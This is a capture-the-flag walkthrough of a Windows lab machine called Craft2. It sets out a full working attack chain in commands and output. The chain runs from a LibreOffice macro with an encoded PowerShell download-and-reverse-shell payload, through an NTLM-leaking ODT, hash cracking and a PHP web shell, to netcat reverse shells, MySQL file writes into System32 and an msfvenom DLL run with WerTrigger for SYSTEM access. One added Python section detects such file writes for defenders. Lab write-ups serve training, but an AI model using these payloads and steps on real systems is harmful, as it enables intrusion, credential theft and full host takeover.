# Craft2

`odt` `responder` `ntlm` `file write` `WerTrigger` `phpmyadmin`

* Machine name: Craft2
* Difficulty: Hard
* OS: Windows

## Enumeration

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-21 15:06 EDT
Nmap scan report for 192.168.228.188
Host is up (0.034s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-title: Craft
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
49666/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

### HTTP (80)

We start by analysing the page. In the menu, "admin login" cannot be clicked; we are told it is still under construction. At the very bottom there is an e-mail address: <admin@craft.offsec>. We add the domain name to /etc/hosts.

Just above, we see that we can upload a file, but only an ODT. If we do provide a valid ODT file:

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FXIxu1slzxGwp3Jg99JwY%2F2761e73b6a49d8f49fdc237caf9c564a.png?alt=media&#x26;token=facfa0cc-0391-4d72-9155-9fb5eec12d8b" alt=""><figcaption></figcaption></figure>

This gives us a good hint about how to proceed...

```
┌──(kali㉿kali)-[~]
└─$ dirsearch -u 192.168.228.188        
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/_192.168.228.188/_24-08-21_15-06-39.txt

Target: http://192.168.228.188/

[15:06:45] Starting: 
[15:06:46] 301 -  339B  - /js  ->  http://192.168.228.188/js/
[15:06:46] 403 -  304B  - /%C0%AE%C0%AE%C0%AF
[15:06:46] 403 -  304B  - /%3f/
[15:06:46] 403 -  304B  - /%ff
[15:06:47] 403 -  304B  - /.ht_wsr.txt
[15:06:47] 403 -  304B  - /.htaccess.bak1
[15:06:47] 403 -  304B  - /.htaccess.sample
[15:06:47] 403 -  304B  - /.htaccess.save
[15:06:47] 403 -  304B  - /.htaccess.orig
[15:06:47] 403 -  304B  - /.htaccess_extra
[15:06:47] 403 -  304B  - /.htaccess_sc
[15:06:47] 403 -  304B  - /.htaccess_orig
[15:06:47] 403 -  304B  - /.htaccessOLD
[15:06:47] 403 -  304B  - /.html
[15:06:47] 403 -  304B  - /.htaccessOLD2
[15:06:47] 403 -  304B  - /.htm
[15:06:47] 403 -  304B  - /.htaccessBAK
[15:06:47] 403 -  304B  - /.htpasswds
[15:06:47] 403 -  304B  - /.htpasswd_test
[15:06:47] 403 -  304B  - /.httr-oauth
[15:06:54] 301 -  343B  - /assets  ->  http://192.168.228.188/assets/
[15:06:54] 200 -    1KB - /assets/
[15:06:55] 403 -  304B  - /cgi-bin/
[15:06:55] 200 -    2KB - /cgi-bin/printenv.pl
[15:06:56] 301 -  340B  - /css  ->  http://192.168.228.188/css/
[15:06:59] 503 -  404B  - /examples/websocket/index.xhtml
[15:06:59] 503 -  404B  - /examples/servlets/servlet/CookieExample
[15:06:59] 503 -  404B  - /examples/servlet/SnoopServlet
[15:06:59] 503 -  404B  - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[15:06:59] 503 -  404B  - /examples/jsp/index.html
[15:06:59] 503 -  404B  - /examples/servlets/servlet/RequestHeaderExample
[15:06:59] 503 -  404B  - /examples/
[15:06:59] 503 -  404B  - /examples/jsp/snp/snoop.jsp
[15:06:59] 503 -  404B  - /examples
[15:06:59] 503 -  404B  - /examples/servlets/index.html
[15:07:00] 403 -  304B  - /index.php::$DATA
[15:07:01] 200 -  981B  - /js/
[15:07:05] 403 -  423B  - /phpmyadmin
[15:07:06] 403 -  423B  - /phpmyadmin/doc/html/index.html
[15:07:06] 403 -  423B  - /phpmyadmin/README
[15:07:06] 403 -  423B  - /phpmyadmin/scripts/setup.php
[15:07:06] 403 -  423B  - /phpmyadmin/ChangeLog
[15:07:06] 403 -  423B  - /phpmyadmin/
[15:07:06] 403 -  423B  - /phpmyadmin/phpmyadmin/index.php
[15:07:06] 403 -  423B  - /phpmyadmin/index.php
[15:07:06] 403 -  423B  - /phpmyadmin/docs/html/index.html
[15:07:08] 403 -  423B  - /server-info
[15:07:08] 403 -  423B  - /server-status
[15:07:08] 403 -  423B  - /server-status/
[15:07:12] 403 -  304B  - /Trace.axd::$DATA
[15:07:12] 200 -  537B  - /upload.php
[15:07:12] 301 -  344B  - /uploads  ->  http://192.168.228.188/uploads/
[15:07:12] 200 -  777B  - /uploads/
[15:07:14] 403 -  304B  - /web.config::$DATA
[15:07:14] 403 -  423B  - /webalizer
[15:07:14] 403 -  423B  - /webalizer/
```

## Initial access

Our payload:

```
IEX(New-Object
System.Net.WebClient).DownloadString('http://192.168.45.189/powercat.ps1');powercat -c
192.168.45.189 -p 4444 -e powershell
```

A Python web server must be running and powercat.ps1 must be present on our machine. We then base64-encode the payload and run the following Python script to split it into chunks for the macro.

```
# Base64-encoded PowerShell command line, split into 50-character chunks so
# that each piece fits on one "Str = Str + ..." line of the macro below.
payload = "powershell.exe -nop -w hidden -e SUVYKE5ldy1PYmplY3QKU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTkyLjE2OC40NS4xODkvcG93ZXJjYXQucHMxJyk7cG93ZXJjYXQgLWMKMTkyLjE2OC40NS4xODkgLXAgNDQ0NCAtZSBwb3dlcnNoZWxs"
chunk = 50
for i in range(0, len(payload), chunk):
    print('Str = Str + "' + payload[i:i + chunk] + '"')
```

We create our macro in LibreOffice:

```
Sub AutoOpen()
	MyMacro
End Sub

Sub Document_Open()
	MyMacro
End Sub

Sub MyMacro()
	Dim Str As String
	
	Str = Str + "powershell.exe -nop -w hidden -e SUVYKE5ldy1PYmplY"
	Str = Str + "3QKU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5"
	Str = Str + "nKCdodHRwOi8vMTkyLjE2OC40NS4xODkvcG93ZXJjYXQucHMxJ"
	Str = Str + "yk7cG93ZXJjYXQgLWMKMTkyLjE2OC40NS4xODkgLXAgNDQ0NCA"
	Str = Str + "tZSBwb3dlcnNoZWxs"

	CreateObject("Wscript.Shell").Run Str
End Sub
```

We tried again with another port, but without success.

We found another way to exploit these ODT files:

<https://github.com/octodi/CVE-2018-10583>

```
┌──(kali㉿kali)-[~/oscp/craft2]
└─$ python3 script2.py  

    ____            __      ____  ____  ______
   / __ )____ _____/ /     / __ \/ __ \/ ____/
  / __  / __ `/ __  /_____/ / / / / / / /_
 / /_/ / /_/ / /_/ /_____/ /_/ / /_/ / __/
/_____/\__,_/\__,_/      \____/_____/_/


Create a malicious ODF document help leak NetNTLM Creds

By Richard Davy 
@rd_pentest
www.secureyourit.co.uk


Please enter IP of listener: 192.168.45.189
```

We start Responder, then upload the ODT file created earlier.

```
┌──(kali㉿kali)-[~]
└─$ sudo responder -I tun0 -v
{...}
[SMB] NTLMv2-SSP Client   : 192.168.228.188
[SMB] NTLMv2-SSP Username : CRAFT2\thecybergeek
[SMB] NTLMv2-SSP Hash     : thecybergeek::CRAFT2:0f130dd97abf8f[...]
{...}
```

We obtain the NetNTLMv2 hash of thecybergeek and crack it with hashcat.

```
┌──(kali㉿kali)-[~/oscp/craft2]
└─$ hashcat -m 5600 'thecybergeek::CRAFT2:dbcc813b3db59f[...]' /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-11th Gen Intel(R) Core(TM) i7-11700F @ 2.50GHz, 7852/15768 MB (2048 MB allocatable), 5MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Initializing backend runtime for device #1. Please be patient.Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

THECYBERGEEK::CRAFT2:dbcc813b3db59f01:4635c6b73b27a3e35b1ffff8cf5d7d60:[...]:winniethepooh
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: THECYBERGEEK::CRAFT2:dbcc813b3db59f01:4635c6b73b27a...000000
Time.Started.....: Wed Aug 21 16:05:31 2024 (0 secs)
Time.Estimated...: Wed Aug 21 16:05:31 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1313.2 kH/s (2.51ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5120/14344385 (0.04%)
Rejected.........: 0/5120 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> babygrl
Hardware.Mon.#1..: Util: 19%

Started: Wed Aug 21 16:05:20 2024
Stopped: Wed Aug 21 16:05:32 2024
```

thecybergeek:winniethepooh

```
┌──(kali㉿kali)-[~]
└─$ smbmap -H 192.168.228.188 -u thecybergeek -p winniethepooh

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
                                                             [*] Established 1 SMB session(s)
                                                                                                                                                                 
[+] IP: 192.168.228.188:445	Name: craft.offsec        	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	READ ONLY	Remote IPC
	WebApp                                            	READ, WRITE
```

We can read and write in the WebApp share. We therefore connect to it and upload a shell.php that will let us execute commands.

```
┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.228.188/WebApp -U thecybergeek
Password for [WORKGROUP\thecybergeek]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Aug 21 16:14:01 2024
  ..                                  D        0  Wed Aug 21 16:14:01 2024
  assets                              D        0  Tue Apr  5 12:16:03 2022
  css                                 D        0  Tue Apr  5 12:16:03 2022
  index.php                           A     9768  Mon Jan 31 11:21:52 2022
  js                                  D        0  Tue Apr  5 12:16:03 2022
  upload.php                          A      896  Mon Jan 31 10:23:02 2022
  uploads                             D        0  Wed Aug 21 16:01:34 2024

		10327807 blocks of size 4096. 2005335 blocks available
```

Listing the share shows where we are: it holds the same index.php, upload.php, uploads/, assets/, css/ and js/ that we saw over HTTP, so the share is the web root.

```
┌──(kali㉿kali)-[~]
└─$ cat shell2.php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>

```

```
smb: \> put shell2.php
putting file shell2.php as \shell2.php (1.2 kb/s) (average 1.2 kb/s)
```

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2F32fDfxZP8HI84YuMJhoA%2F27ee0266218f10eb6777fdd982a9080b.png?alt=media&#x26;token=29c558fa-e0ff-48d6-8420-02dabd515863" alt=""><figcaption></figcaption></figure>

We added nc.exe to the machine, then used netcat to obtain a reverse shell.

```
certutil -f -urlcache http://192.168.45.189/Tools/nc.exe nc.exe
nc.exe 192.168.45.189 135 -e powershell
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 135  
listening on [any] 135 ...
connect to [192.168.45.189] from (UNKNOWN) [192.168.228.188] 49778
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\xampp\htdocs> whoami
whoami
craft2\apache
```

## Privilege escalation

We first switch to the user found earlier using the RunasCs.exe executable. We download it to the machine and then run it.

```
PS C:\xampp\htdocs> iwr -uri http://192.168.45.189/Tools/RunasCs.exe -Outfile runas.exe
PS C:\xampp\htdocs> ./runas.exe thecybergeek winniethepooh "./nc.exe 192.168.45.189 135 -e powershell"
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 135   
listening on [any] 135 ...
connect to [192.168.45.189] from (UNKNOWN) [192.168.228.188] 49787
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
craft2\thecybergeek
```

We run winPEAS:

```
PS C:\xampp\htdocs> iwr -uri http://192.168.45.189/Tools/winpeas.exe -Outfile winpeas.exe
iwr -uri http://192.168.45.189/Tools/winpeas.exe -Outfile winpeas.exe
PS C:\xampp\htdocs> ./winpeas.exe
```

We can see that there are MySQL and Apache services. We set up port forwarding with chisel to reach phpMyAdmin, so we download it to the target.

```
┌──(kali㉿kali)-[~]
└─$ chisel server -p 7777 -reverse
2024/08/21 17:15:45 server: Reverse tunnelling enabled
2024/08/21 17:15:45 server: Fingerprint fU6r3mB4dXTcSLuuuoUCn7H5ffevafMnMKu+Vbc+XDA=
2024/08/21 17:15:45 server: Listening on http://0.0.0.0:7777

PS C:\xampp\htdocs> ./chisel.exe client 192.168.45.189:7777 R:8888:127.0.0.1:80
```

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FhOPgCLbx7GCy5UI4Dofh%2F224bf17ba8fa26e497cbf128ef35ee22.png?alt=media&#x26;token=71cf20fa-f3e5-493a-b346-5a2ba37378df" alt=""><figcaption></figcaption></figure>

We check what file access we have through a SQL query, reading a file from the Administrator's desktop and writing it to C:\.

```
SELECT LOAD_FILE('C:/Users/Administrator/Desktop/proof.txt') INTO DUMPFILE "C:\\proof.txt"
```

Let's see how to obtain a shell from this.

{% embed url="<https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---privileged-file-write>" %}

There are 4 different methods. We will use WerTrigger.

We clone the GitHub repository and transfer the files to the target, either via SMB or via certutil/iwr; Report.wer and WerTrigger.exe must be in the same directory (here C:\xampp\htdocs).

We use our file-write rights to write phoneinfo.dll into C:\Windows\System32:

```
SELECT LOAD_FILE("C:\\xampp\\htdocs\\phoneinfo.dll") INTO DUMPFILE "C:\\Windows\\System32\\phoneinfo.dll"
```
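From the defender's side, as an added example that is not part of this writeup: both SQL statements above only work because MySQL/MariaDB is allowed to read and write arbitrary paths on the host. The `secure_file_priv` server variable confines `LOAD_FILE()` and `INTO OUTFILE`/`DUMPFILE` to a single directory (an empty value means no restriction). The script below runs over constructed general-log lines and flags every file write whose target lies outside that directory; the log lines and the `C:/xampp/mysql/data/uploads` path are assumptions.

```python
import re

# Constructed MySQL/MariaDB general_log lines (sample data, not taken from the target).
SAMPLE_LOG = [
    '2024-08-21T21:19:40Z\t12 Query\tSELECT * FROM users WHERE id = 1',
    '2024-08-21T21:20:01Z\t12 Query\tSELECT LOAD_FILE(\'C:/Users/Administrator/Desktop/proof.txt\') INTO DUMPFILE "C:\\\\proof.txt"',
    '2024-08-21T21:21:15Z\t12 Query\tSELECT LOAD_FILE("C:\\\\xampp\\\\htdocs\\\\phoneinfo.dll") INTO DUMPFILE "C:\\\\Windows\\\\System32\\\\phoneinfo.dll"',
    "2024-08-21T21:22:03Z\t13 Query\tSELECT name INTO OUTFILE 'C:/xampp/mysql/data/uploads/export.csv' FROM products",
]

# Matches the file-write clause and captures the quoted target path.
FILE_WRITE_RE = re.compile(r"""INTO\s+(DUMPFILE|OUTFILE)\s+(['"])(.*?)\2""", re.IGNORECASE)


def normalize_path(literal):
    """Make a path taken from a SQL string literal comparable: undo the doubled
    backslashes of the literal, use forward slashes, ignore case (Windows paths)."""
    return literal.replace("\\\\", "\\").replace("\\", "/").lower()


def find_file_writes(log_lines, secure_file_priv):
    """Return (kind, target, allowed) for every INTO DUMPFILE/OUTFILE statement.

    allowed is True only when the target lies below the secure_file_priv directory;
    with secure_file_priv empty the server accepts any path, so every write is flagged."""
    allowed_dir = normalize_path(secure_file_priv).rstrip("/") + "/" if secure_file_priv else None
    findings = []
    for line in log_lines:
        m = FILE_WRITE_RE.search(line)
        if m is None:
            continue
        target = normalize_path(m.group(3))
        allowed = allowed_dir is not None and target.startswith(allowed_dir)
        findings.append((m.group(1).upper(), target, allowed))
    return findings


if __name__ == "__main__":
    # Hardened setting: writes confined to one directory. Pass "" to see the weak setting flag all writes.
    for kind, target, allowed in find_file_writes(SAMPLE_LOG, "C:/xampp/mysql/data/uploads"):
        print(f"{'ok   ' if allowed else 'ALERT'} {kind} -> {target}")
```

Setting `secure_file_priv` in my.ini to that directory (or to NULL to disable file operations entirely) turns the flagged writes into server-side errors; the log check above is what remains useful when the setting cannot be changed.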

We can now run the exploit!

```
PS C:\xampp\htdocs> ./WerTrigger.exe
whoami
```

No output. Let's try a different approach.

We try generating a reverse shell directly as the phoneinfo.dll file.

```
┌──(kali㉿kali)-[~]
└─$ msfvenom -platform windows --arch x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.189 LPORT=443 -f dll -o phoneinfo.dll
```

We reset the machine and redid the previous steps, replacing phoneinfo.dll with the one we just generated. We run the exploit... It works!

```
┌──(kali㉿kali)-[~/oscp/WerTrigger/bin]
└─$ nc -lnvp 443            
listening on [any] 443 ...
connect to [192.168.45.189] from (UNKNOWN) [192.168.178.188] 49724
dir
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
```

We are indeed nt authority\system.

Looking at the source code on GitHub, we can see that the original phoneinfo.dll opens port 1337; perhaps that is why it did not work.
